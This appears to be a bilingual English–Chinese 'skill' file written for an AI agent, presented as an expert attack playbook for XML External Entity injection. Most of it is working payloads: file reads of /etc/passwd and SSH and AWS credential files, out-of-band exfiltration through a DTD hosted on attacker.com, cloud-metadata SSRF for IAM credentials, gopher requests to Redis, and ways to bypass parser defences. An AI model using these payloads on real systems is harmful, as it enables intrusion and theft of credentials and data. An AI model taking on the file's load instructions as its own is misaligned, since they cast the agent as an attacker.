xxe-xml-external-entity
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChineseSKILL: XML External Entity Injection (XXE) — Expert Attack Playbook
技能:XML外部实体注入(XXE)—— 专家级攻击手册
AI LOAD INSTRUCTION: Expert XXE techniques. Covers all injection contexts (SOAP, REST JSON→XML parsers, Office files, SVG), OOB exfiltration (critical when direct read fails), blind XXE detection, and XXE-to-SSRF chain. Base models often miss OOB and non-XML context XXE. For real-world CVE chains, Office docx XXE step-by-step, PHP expect:// RCE, and Solr XXE+RCE, load the companion SCENARIOS.md.
AI加载说明:专业XXE技术,覆盖所有注入场景(SOAP、REST JSON→XML解析器、Office文件、SVG)、OOB(带外)数据窃取(直接读取失败时至关重要)、盲XXE检测,以及XXE转SSRF攻击链。基础大模型通常会遗漏OOB和非XML上下文的XXE场景。如需了解真实CVE攻击链、Office docx XXE分步教程、PHP expect:// RCE、Solr XXE+RCE相关内容,请加载配套的SCENARIOS.md。
0. RELATED ROUTING
0. 相关关联技能
Also load:
- upload insecure files when XXE is reachable through SVG, OOXML, import, or preview pipelines
同时加载:
- 当XXE可通过SVG、OOXML、导入或预览流程触发时,加载不安全文件上传
Extended Scenarios
扩展场景
Also load SCENARIOS.md when you need:
- Apache Solr XXE + RCE chain (CVE-2017-12629) — XXE to read config, then VelocityResponseWriter for RCE
- Office docx XXE step-by-step — unzip → inject DOCTYPE into or
word/document.xml→ repackage → upload[Content_Types].xml - DOCTYPE-based blind SSRF — external DTD reference triggers HTTP callback without entity reflection
PUBLIC - PHP protocol via XXE — direct command execution when expect extension is installed
expect:// - Blind XXE via error messages — force file path error that leaks content in exception text
- XXE in SOAP web services — inject entities into SOAP Envelope/Body elements
当你需要以下内容时,同时加载SCENARIOS.md:
- Apache Solr XXE + RCE攻击链(CVE-2017-12629)—— 通过XXE读取配置,再利用VelocityResponseWriter实现RCE
- Office docx XXE分步教程—— 解压 → 向或
word/document.xml中注入DOCTYPE → 重新打包 → 上传[Content_Types].xml - 基于DOCTYPE的盲SSRF—— 外部DTD引用会触发HTTP回调,无需实体回显
PUBLIC - 通过XXE使用PHP 协议—— 当expect扩展安装时可直接执行命令
expect:// - 通过错误消息实现盲XXE—— 强制触发文件路径错误,在异常文本中泄露内容
- SOAP Web服务中的XXE—— 向SOAP Envelope/Body元素中注入实体
1. CLASSIC XXE PAYLOAD
1. 经典XXE payload
xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>If reflects in response → confirmed file read.
/etc/passwdxml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>如果内容在响应中回显 → 确认存在文件读取漏洞。
/etc/passwd2. ATTACK SURFACE DISCOVERY
2. 攻击面发现
Direct XML Inputs
直接XML输入
- SOAP endpoints (,
text/xml)application/soap+xml - REST APIs accepting
application/xml - File upload: ,
.xlsx,.docx(Office Open XML).pptx - SVG uploads (SVG is XML)
- RSS/Atom feed parsers
- Web services with XML config import
- SOAP接口(、
text/xml)application/soap+xml - 支持的REST API
application/xml - 文件上传:、
.xlsx、.docx(Office Open XML格式).pptx - SVG上传(SVG本身就是XML格式)
- RSS/Atom订阅源解析器
- 支持XML配置导入的Web服务
Non-Obvious XML Processing
非显性XML处理场景
Change header on any JSON POST to:
Content-TypeContent-Type: application/xmlThen rewrite body as XML — many backends use dual-format parsers or auto-detect.
将任意JSON POST请求的请求头修改为:
Content-TypeContent-Type: application/xml然后将请求体重写为XML格式—— 很多后端使用双格式解析器或自动识别解析格式。
PDF Generators
PDF生成器
Some HTML→PDF tools (wkhtmltopdf, PrinceXML) execute SSRF via embedded URLs but also parse external entities in SVG/XML included in the HTML.
部分HTML转PDF工具(wkhtmltopdf、PrinceXML)不仅会通过嵌入的URL执行SSRF,还会解析HTML中包含的SVG/XML的外部实体。
3. OOB (OUT-OF-BAND) XXE — CRITICAL
3. OOB(带外)XXE —— 核心技巧
Use when direct entity reflection fails (server parses but doesn't echo entity content):
当实体直接回显失败时使用(服务端会解析但不会返回实体内容):
Step 1: Blind detection
步骤1:盲检测
xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://BURP_COLLABORATOR/">]>
<root>&xxe;</root>DNS/HTTP hit to collaborator → confirms XXE (even if no file content returned).
xml
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://BURP_COLLABORATOR/">]>
<root>&xxe;</root>如果Burp Collaborator收到DNS/HTTP请求 → 确认存在XXE(即使没有返回文件内容)。
Step 2: OOB file exfiltration via attacker-hosted DTD
步骤2:通过攻击者托管的DTD实现OOB文件窃取
Attacker's server hosts a malicious DTD at :
http://attacker.com/evil.dtdxml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;Payload sent to target:
xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&exfiltrate;</root>File contents appear in attacker's HTTP server request log.
攻击者服务器托管恶意DTD,地址为:
http://attacker.com/evil.dtdxml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfil "<!ENTITY exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%exfil;发送到目标的payload:
xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root>&exfiltrate;</root>文件内容会出现在攻击者HTTP服务器的请求日志中。
Step 3: Error-based OOB (alternative when HTTP blocked)
步骤3:基于错误的OOB(HTTP被拦截时的替代方案)
Use intentional error to leak data in error message:
xml
<!-- attacker.com/error.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///NONEXISTENT/%file;'>">
%eval;
%error;利用故意触发的错误在错误消息中泄露数据:
xml
<!-- attacker.com/error.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///NONEXISTENT/%file;'>">
%eval;
%error;4. XXE FILE READ TARGETS
4. XXE文件读取目标
Linux:
/etc/passwd
/etc/shadow (requires root)
/etc/hosts
/proc/self/environ ← environment variables (DB creds, API keys)
/proc/self/cmdline ← process command line
/var/log/apache2/access.log ← may contain passwords in URLs
/home/USER/.ssh/id_rsa ← SSH private key
/home/USER/.aws/credentials ← AWS keys
/home/USER/.bash_historyWindows:
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config ← ASP.NET connection strings
C:\xampp\htdocs\wp-config.php ← WordPress DB credentials
C:\Users\Administrator\.ssh\id_rsaLinux系统:
/etc/passwd
/etc/shadow (需要root权限)
/etc/hosts
/proc/self/environ ← 环境变量(数据库凭证、API密钥)
/proc/self/cmdline ← 进程启动命令行
/var/log/apache2/access.log ← 可能包含URL中的密码
/home/USER/.ssh/id_rsa ← SSH私钥
/home/USER/.aws/credentials ← AWS密钥
/home/USER/.bash_historyWindows系统:
C:\Windows\System32\drivers\etc\hosts
C:\inetpub\wwwroot\web.config ← ASP.NET连接字符串
C:\xampp\htdocs\wp-config.php ← WordPress数据库凭证
C:\Users\Administrator\.ssh\id_rsa5. SVG XXE (file upload context)
5. SVG XXE(文件上传场景)
When SVG uploads are accepted and served/processed:
xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="500" height="100">
<text font-size="16">&xxe;</text>
</svg>Upload as → → file contents in response.
.svgGET /uploads/file.svg当站点接受SVG上传并提供访问/处理服务时:
xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="500" height="100">
<text font-size="16">&xxe;</text>
</svg>上传为格式 → 访问 → 响应中会返回文件内容。
.svgGET /uploads/file.svg6. OFFICE FILE XXE (docx/xlsx/pptx)
6. Office文件XXE(docx/xlsx/pptx)
Office files are ZIP archives containing XML. Inject into or :
[Content_Types].xmlword/document.xmlbash
undefinedOffice文件是包含XML的ZIP压缩包,将payload注入到或中:
[Content_Types].xmlword/document.xmlbash
undefinedStep 1: extract
步骤1:解压文件
unzip original.docx -d extracted/
unzip original.docx -d extracted/
Step 2: edit word/document.xml — add malicious DTD
步骤2:编辑word/document.xml — 添加恶意DTD
Add after <?xml version="1.0" encoding="UTF-8" standalone="yes"?>:
在<?xml version="1.0" encoding="UTF-8" standalone="yes"?>之后添加:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Then use &xxe; inside document text
然后在文档文本中使用&xxe;
Step 3: repackage
步骤3:重新打包
cd extracted && zip -r ../malicious.docx .
---cd extracted && zip -r ../malicious.docx .
---7. SOAP ENDPOINT XXE
7. SOAP接口XXE
SOAP requests parse XML by definition. Inject external entity into SOAP envelope:
xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<getUser>
<id>&xxe;</id>
</getUser>
</soap:Body>
</soap:Envelope>SOAP请求原生就会解析XML,向SOAP信封中注入外部实体:
xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<getUser>
<id>&xxe;</id>
</getUser>
</soap:Body>
</soap:Envelope>8. XXE → SSRF CHAIN
8. XXE → SSRF攻击链
XXE external entity can point to internal HTTP endpoints (identical to SSRF):
xml
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&xxe;</root>This combines XXE file read + SSRF into a single payload.
XXE外部实体可以指向内部HTTP端点(效果和SSRF完全一致):
xml
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&xxe;</root>这个payload将XXE文件读取和SSRF合并为单步攻击。
9. XInclude ATTACK
9. XInclude攻击
When server-side processes XInclude (import XML from another source), but you can't control the DOCTYPE:
xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/passwd" parse="text"/>
</foo>Works in: Apache Cocoon, Xerces-J, libxml2 with XInclude support enabled.
当服务端处理XInclude(从其他源导入XML),但你无法控制DOCTYPE时:
xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/passwd" parse="text"/>
</foo>适用场景:Apache Cocoon、Xerces-J、开启XInclude支持的libxml2。
10. PROTOCOL HANDLERS IN XXE
10. XXE中的协议处理器
xml
<!-- HTTP (SSRF) -->
<!ENTITY xxe SYSTEM "http://internal.company.com/admin/">
<!-- File read -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!-- PHP wrapper (if PHP with libxml2) -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!-- Decode base64 in response to get file contents -->
<!-- FTP (exfil / port scan) -->
<!ENTITY xxe SYSTEM "ftp://attacker.com:21/x">
<!-- Gopher (Redis, SMTP) -->
<!ENTITY xxe SYSTEM "gopher://127.0.0.1:6379/info%0d%0a">xml
<!-- HTTP(SSRF) -->
<!ENTITY xxe SYSTEM "http://internal.company.com/admin/">
<!-- 文件读取 -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<!-- PHP包装器(如果PHP使用libxml2) -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!-- 对响应中的base64内容解码即可获取文件内容 -->
<!-- FTP(数据窃取/端口扫描) -->
<!ENTITY xxe SYSTEM "ftp://attacker.com:21/x">
<!-- Gopher(操作Redis、SMTP) -->
<!ENTITY xxe SYSTEM "gopher://127.0.0.1:6379/info%0d%0a">11. BYPASSING DEFENSES
11. 防御绕过
Parser blocks DOCTYPE
解析器拦截DOCTYPE
Try XInclude (no DOCTYPE needed, see §9).
尝试使用XInclude(不需要DOCTYPE,见第9节)。
Only allows specific XML schemas
仅允许特定XML schema
If schema validation occurs: inject comments or CDATA after schema validation but before entity processing.
如果存在schema校验:在schema校验之后、实体处理之前注入注释或CDATA。
Response encoding issues (binary in response)
响应编码问题(响应中返回二进制内容)
Use PHP filter for base64:
xml
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">使用PHP过滤器进行base64编码:
xml
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">Network restrictions on OOB
OOB存在网络限制
Use DNS-only OOB via — no HTTP required, DNS lookup leaks data.
SYSTEM "file://HASH.attacker.com"通过使用仅DNS的OOB—— 不需要HTTP请求,DNS查询即可泄露数据。
SYSTEM "file://HASH.attacker.com"12. QUICK DETECTION CHECKLIST
12. 快速检测清单
□ Find XML input point (or JSON→XML transformation)
□ Send basic entity: <!ENTITY xxe "test"> → &xxe; in body → does "test" reflect?
□ If yes → file read: SYSTEM "file:///etc/passwd"
□ If no reflection → OOB test via Collaborator URL
□ If OOB hit → set up attacker DTD for file exfiltration
□ Try SVG upload with XXE
□ Try Content-Type: application/xml on JSON endpoints
□ Try XInclude if DOCTYPE-based fails□ 找到XML输入点(或JSON→XML转换点)
□ 发送基础实体:<!ENTITY xxe "test"> → 请求体中使用&xxe; → 检查响应中是否回显"test"
□ 是 → 尝试文件读取:SYSTEM "file:///etc/passwd"
□ 没有回显 → 通过Collaborator URL进行OOB测试
□ 收到OOB请求 → 搭建攻击者DTD实现文件窃取
□ 尝试上传带XXE的SVG文件
□ 尝试将JSON接口的Content-Type改为application/xml测试
□ 如果基于DOCTYPE的攻击失败,尝试XInclude攻击13. LOCAL DTD INJECTION (BLIND XXE AMPLIFICATION)
13. 本地DTD注入(盲XXE增强技巧)
When external entities are blocked but local DTD files exist on the server:
当外部实体被拦截,但服务端存在本地DTD文件时:
Technique
技巧实现
xml
<!-- Override an entity defined in a LOCAL DTD file -->
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>xml
<!-- 重写本地DTD文件中定义的实体 -->
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>Common Local DTD Paths
常见本地DTD路径
Linux
Linux系统
/usr/share/yelp/dtd/docbookx.dtd # GNOME Help
/usr/share/xml/fontconfig/fonts.dtd # Fontconfig
/usr/share/sgml/docbook/xml-dtd-*/docbookx.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd
/usr/share/struts/struts-config_1_0.dtd # Apache Struts
/usr/share/nmap/nmap.dtd # Nmap
/opt/zaproxy/xml/alert.dtd # OWASP ZAP/usr/share/yelp/dtd/docbookx.dtd # GNOME帮助文档
/usr/share/xml/fontconfig/fonts.dtd # Fontconfig
/usr/share/sgml/docbook/xml-dtd-*/docbookx.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd
/usr/share/struts/struts-config_1_0.dtd # Apache Struts
/usr/share/nmap/nmap.dtd # Nmap
/opt/zaproxy/xml/alert.dtd # OWASP ZAPWindows
Windows系统
C:\Windows\System32\wbem\xml\cim20.dtd # WMI
C:\Windows\System32\wbem\xml\wmi20.dtd # WMI
C:\Program Files\IBM\WebSphere\*.dtd # WebSphere
C:\Program Files (x86)\Lotus\*.dtd # Lotus NotesC:\Windows\System32\wbem\xml\cim20.dtd # WMI
C:\Windows\System32\wbem\xml\wmi20.dtd # WMI
C:\Program Files\IBM\WebSphere\*.dtd # WebSphere
C:\Program Files (x86)\Lotus\*.dtd # Lotus NotesInside JAR Files (Java Applications)
JAR文件内部(Java应用)
jar:file:///usr/share/java/tomcat-*.jar!/javax/servlet/resources/web-app_2_3.dtd
jar:file:///opt/wildfly/modules/*.jar!/org/jboss/as/*.dtd
file:///usr/share/java/struts2-core-*.jar!/struts-2.5.dtdjar:file:///usr/share/java/tomcat-*.jar!/javax/servlet/resources/web-app_2_3.dtd
jar:file:///opt/wildfly/modules/*.jar!/org/jboss/as/*.dtd
file:///usr/share/java/struts2-core-*.jar!/struts-2.5.dtdWhy This Works
原理说明
- External connections blocked (firewall/WAF/egress filter)
- But file:// to LOCAL files is usually allowed
- Local DTD is trusted → entity overrides inject attacker-controlled definitions
- Error messages or blind extraction via file:// still works
- 外部连接被拦截(防火墙/WAF/出站过滤)
- 但访问本地文件的file://协议通常被允许
- 本地DTD是被信任的 → 实体重写可以注入攻击者控制的定义
- 错误消息或通过file://的盲提取仍然有效